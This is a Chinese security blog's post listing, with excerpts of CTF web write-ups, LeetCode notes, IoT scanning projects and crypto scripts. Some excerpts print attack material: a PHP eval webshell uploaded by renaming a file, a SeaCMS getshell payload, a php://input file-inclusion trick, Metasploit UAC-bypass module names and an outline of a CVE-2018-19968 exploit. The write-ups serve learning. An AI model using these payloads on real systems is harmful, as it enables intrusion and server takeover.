- 博客(29)
- 收藏
- 关注
RSS订阅原创 php语法笔记
php数据结构$x = 5985;var_dump($x);echo "<br>";$x = -345; // 负数var_dump($x);echo "<br>";$x = 0x8C; // 十六进制数var_dump($x);echo "<br>";$x = 047; // 八进制数var_dump($x);echo "</br>";$x = 10.365;var_dump($x);echo "<br>";$x
2021-04-20 21:55:15
265
原创 E安WEB后渗透阶段
后渗透阶段课程概要权限提升:权限提升的几种方式提高程序运行级别msf模块exploit/windows/local/ask (用户弹窗,需要交互)UAC绕过 (无用户交互)msf模块exploit/windows/local/bypassuacexploit/windows/local/bypassuac_injectionexploit/windows/local/bypassuac_vbs利用提权漏洞进行提权msf模块exploit/win
2021-04-19 22:49:14
314
原创 brainfuck python脚本 && misc题目can_has_stdio?
BrainfuckBrainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。这种语言,是一种按照“Turing complete(图灵完备)”思想设计的语言,它的主要设计思路是:用最小的概念实现一种“简单”的语言,BrainF**k 语言只有八种符号,所有的操作都由这八种符号的组合来完成。下面是这八种状态的描述,其中每个状态由一个字符标识:字符含义
2021-02-01 20:05:31
3717
8
原创 【物联网识别】nmap && zgrab2扫描网络
设计要求设计并制作出一种漏洞扫描平台,其要求如下:( 1 )熟悉爬虫,爬取漏洞、设备详细数据,构建漏洞库、设备指纹库。( 2 )使用 nmap 工具扫描网络,使用 zgrab2 工具辅助扫描网络。( 3 )完成设备指纹识别,漏洞匹配过程。( 4 )使用 nessus 工具验证漏洞。( 5 )搭建可视化平台。( 6 )完成设计报告nmap 是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。 确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerp
2021-01-27 23:30:06
2217
3
原创 【物联网识别】cve_details漏洞爬虫 && 设备指纹库爬虫
设计要求设计并制作出一种漏洞扫描平台,其要求如下:( 1 )熟悉爬虫,爬取漏洞、设备详细数据,构建漏洞库、设备指纹库。( 2 )使用 nmap 工具扫描网络,使用 zgrab2 工具辅助扫描网络。( 3 )完成设备指纹识别,漏洞匹配过程。( 4 )使用 nessus 工具验证漏洞。( 5 )搭建可视化平台。( 6 )完成设计报告爬虫:本项目中使用 python 语言对 CVE_Details、CNVD、 CNNVD、securityfocus、 ics_cnvd 等漏洞网站爬取不少
2021-01-03 21:49:40
5676
16
原创 “这编译器真好,速度特别快!”
分享一则编译器的趣事,内容取自【日】川合秀实的《20天自制操作系统》unsigned int memtest_sub(unsigned int start, unsigned int end){ unsigned int i, *p, old, pat0 = 0xaa55aa55, pat1 = 0x55aa55aa; for (i = start; i <= end; i += 4) { p = (unsigned int *) i; old =
2020-12-17 18:26:14
251
原创 python实现RSA加密算法 1024位密钥
'''RSA算法,它通常是先生成一对RSA密钥,其中之一是保密密钥,由用户保存;另一个为公开密钥,可对外公开,甚至可在网络服务器中注册。为提高保密强度,RSA密钥至少为500位长,一般推荐使用1024位。这就使加密的计算量很大。为减少计算量,在传送信息时,常采用传统加密方法与公开密钥加密方法相结合的方式,即信息采用改进的DES或IDEA密钥加密,然后使用RSA密钥加密对话密钥和信息摘要。对方收到信息后,用不同的密钥解密并可核对信息摘要。1. 随意选择两个大的质数p和q,p不等于q,计算N=p
2020-12-11 21:47:50
4470
1
原创 【笔记】LeetCode 941. 有效的山脉数组
941. 有效的山脉数组难度 简单给定一个整数数组 A,如果它是有效的山脉数组就返回 true,否则返回 false。让我们回顾一下,如果 A 满足下述条件,那么它是一个山脉数组:A.length >= 3在 0 < i < A.length - 1 条件下,存在 i 使得:A[0] < A[1] < … A[i-1] < A[i]A[i] > A[i+1] > … > A[A.length - 1][外链图片转存失败,源站可
2020-11-03 16:35:43
791
原创 指定时间间隔爬取一次的延时爬虫
因为最近有比赛快出入围决赛名单了,抑制不住内心的激动隔几分钟就刷新一下网页,干脆写了个爬虫每10秒访问一次,如果有更新直接发邮箱通知队友们当然,在没告知队友的情况下这封邮件理所应当的被当成了钓鱼邮件,下面记录一下中间不太懂的过程本文用了requests HTTP库请求网站,beautifulsoup解析网页,smtplib提供SMTP邮件传输协议服务,email库构造邮件,以及用了sched时间调度器和time库来控制一段延时执行函数import requestsfrom bs4 import
2020-07-24 21:26:16
6165
1
原创 数据安全法(草案)概述
“当前刑法仅对买卖、交易个人信息做出处罚,并没有详细涉及数据泄露问题。面对诸如2018年华住酒店5亿条信息泄露这样的大范围数据泄露,我国目前法律框架不管是刑法还是网络安全法,都没有规定企业要承担什么责任。说白了,泄露也就泄露了。监管机构没有法律依据,就不能追究企业责任,这个问题亟需解决。”——上海交通大学数据法律研究中心执行主任何渊《中华人民共和国数据安全法》是一部条件比较成熟、任期内拟提请审议的法律草案。 2020年7月3日,《中华人民共和国数据安全法(草案)》全文在中国人大网公开征求意见。草案.
2020-07-06 20:23:01
1045
原创 i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍题目内容:12341234,然后就解开了本题来自擂主C26题目链接请在i春秋申请login.php源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了常见的Web源码泄露漏洞git源码泄露Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等s
2020-07-05 23:25:32
1008
原创 i春秋CTF训练 Web Test
Web Test题目内容:善于查资料,你就可以拿一血了。题目链接请在i春秋申请根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
2020-07-05 18:11:55
1597
原创 i春秋CTF训练 Web 破译
Web 破译题目内容:破译下面的密文:TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W
2020-07-04 22:31:38
1108
原创 i春秋CTF训练 Web Login
Web Login题目内容:加油,我看好你本题由擂主Wfox提供题目链接请在i春秋申请访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释<!-- test1 test1 -->试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
2020-07-04 21:05:39
4897
原创 i春秋CTF训练 Web Do you know upload?
Web Do you know upload?题目内容:加油吧,少年。题目链接请在i春秋申请一个简单的文件上传,写个一句话命名为2.jpg,用burpsuit抓包后改为2.php上传成功<?php @eval($_POST[cmd]);?>返回了上传路径,用蚁剑连接此路径,密码为cmd,可成功连接查看config.php发现数据库配置信息<?phperror_reporting(0);session_start();$servername = "local
2020-07-02 15:18:24
629
原创 i春秋CTF训练 Web broken
Web broken题目内容:http://106.75.72.168:1111/you got a file, but …file指向http://106.75.72.168:1111/fffffaaakk打开页面发现jsfuck加密后的代码复制后放进notepad++里,发现没有与第一个[对应的],在后面补一个,然后删除最后面代表function调用的(),复制放进浏览器的concole执行,得到flag...
2020-06-30 18:33:25
496
原创 i春秋CTF训练 Web who are you?
Web who are you?题目内容:http://106.75.72.168:2222/我是谁,我在哪,我要做什么?在文件头发现了Cookierole=Zjo1OiJ0aHJmZyI7将Zjo1OiJ0aHJmZyI7base64解码得到f:5:"thrfg";使用凯撒密码爆破thrfg发现其位移13位是guest故可以用admin的rot-13:nqzva,构造f:5:"nqzva"然后base64加密Zjo1OiJucXp2YSI=用burpsuit抓包改cookie得到
2020-06-30 17:51:28
647
原创 i春秋CTF训练 Web include
Web include题目内容:没错!就是文件包含漏洞。链接需到ichunqiu网站申请页面显示出了phpinfo.php的信息以及php源码<?php show_source(__FILE__);if(isset($_REQUEST['path'])){ include($_REQUEST['path']);}else{ include('phpinfo.php');}发现可以直接对path进行利用,构造path=php://input,同时post : &
2020-06-30 17:16:39
1258
原创 i春秋CTF训练 Misc Web 爆破-3
Misc Web 爆破-3题目内容:这个真的是爆破。链接需到ichunqiu网站申请页面显示出源码<?php error_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea';}if($_SESSIO
2020-06-30 16:01:58
448
原创 i春秋CTF训练 Web SQL
Web SQL题目内容:出题人就告诉你这是个注入,有种别走!链接需到ichunqiu网站申请xxx.changame.ichunqiu.com/index.php?id=1xxx.changame.ichunqiu.com/index.php?id=1=1xxx.changame.ichunqiu.com/index.php?id=1=21=1时正常访问,1=2时页面为空白,为数字型注入xxx.changame.ichunqiu.com/index.php?id=1 order b
2020-06-27 23:48:12
468
原创 简单图片隐写术练习题
隐写术练习题【题目及工具地址】:https://github.com/RookieDrummer/Simple-picture-steganography.git目录隐写术练习题2.png566.gif2010112719152853781.gifeg_tulip.jpgflag.exeout.jpgout2.jpgrose.jpgta.jpgxx.gifJPEG(jpg),文件头:FF D8 FF E0 00 10 4A 46 49 46 文件尾:FF D9PNG (png),文件头: 89
2020-06-26 21:13:23
2945
原创 Upload-libs1-17 文件上传
文件上传目录[Pass-01 js检查](#Pass-01 js检查)[Pass-02 Content验证](#Pass-02 Content验证)[Pass-03 黑名单](#Pass-03 黑名单)[Pass-04 htaccess](#Pass-04 htaccess)[Pass-05 大小写](#Pass-05 大小写)[Pass-06 空格](#Pass-06 空格)[Pass-07 点号](#Pass-07 点号)[Pass-08 ::DATA](#Pass-08 ::DA
2020-06-23 18:46:00
595
原创 爬虫 web登录 CVE-2018-19968
安全脚本开发目标以CVE-2018-19968为例,写exp,一键getshell所需工具: python / burp,可选 pycharm / ipython1. 简单爬虫python requests库指定汉字的笔划动图下载2. web登录3. CVE-2018-19968 手动利用phpMyAdmin文件包含4. 编写exp登录执行SQL文件包含写入webshell目录一、简单爬虫二、Web登录三、CVE-2018-19968四、编写exp
2020-06-22 20:36:37
830
3
原创 i春秋CTF训练 Web Upload
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1)题目内容:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中链接需到ichunqiu网站申请访问网页得到文件上传输入框明显是文件上传漏洞方法一:上传木马上传小马<?pHp @eval($_POST['123']);?>页面显示@eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
2020-06-21 15:08:24
1332
原创 【笔记】LeetCode 3. 无重复字符的最长子串
3. 无重复字符的最长子串难度 中等给定一个字符串,请你找出其中不含有重复字符的 最长子串 的长度。示例1:输入: "abcabcbb"输出: 3 解释: 因为无重复字符的最长子串是 "abc",所以其长度为 3。示例2:输入: "bbbbb"输出: 1解释: 因为无重复字符的最长子串是 "b",所以其长度为 1。示例3:输入: "pwwkew"输出: 3解释: 因为无重复字符的最长子串是 "wke",所以其长度为 3。 请注意,你的答案必须是 子串 的长度,"p
2020-06-21 13:33:10
210
原创 i春秋CTF训练 Misc Web 爆破-2
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1)题目内容:flag不在变量中。链接需到ichunqiu网站申请访问网页得到php代码<?phpinclude "flag.php";$a = @$_REQUEST['hello'];eval( "var_dump($a);");show_source(__FILE__);依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.
2020-06-20 23:52:51
639
原创 【笔记】LeetCode 2.两数相加
2. 两数相加难度 中等给出两个 非空 的链表用来表示两个非负的整数。其中,它们各自的位数是按照 逆序 的方式存储的,并且它们的每个节点只能存储 一位 数字。如果,我们将这两个数相加起来,则会返回一个新的链表来表示它们的和。您可以假设除了数字 0 之外,这两个数都不会以 0 开头。示例:输入:(2 -> 4 -> 3) + (5 -> 6 -> 4)输出:7 -> 0 -> 8原因:342 + 465 = 807记几个的代码大神的代码记几个
2020-06-20 23:06:59
183
1
原创 i春秋CTF训练 Misc Web 爆破-1
Misc Web 爆破-1题目内容:flag就在某六位变量中。http://8007423c57e9409f94f941eac88ab2157ad7f90842f0497b.changame.ichunqiu.com:80访问网页得到php代码<?phpinclude "flag.php";$a = @$_REQUEST['hello'];if(!preg_match('/^\w*$/',$a )){ die('ERROR');}eval("var_dump($$a);")
2020-06-19 23:22:04
1130
原创 【笔记】LeetCode 1.两数之和
1. 两数之和难度 简单给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。示例:给定 nums = [2, 7, 11, 15], target = 9因为 nums[0] + nums[1] = 2 + 7 = 9所以返回 [0, 1]方法一:暴力法方法二:哈希表法方法三:哈希表法改方法一:暴力法直接套两个循环暴力解题代码如下
2020-06-19 21:33:37
244
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人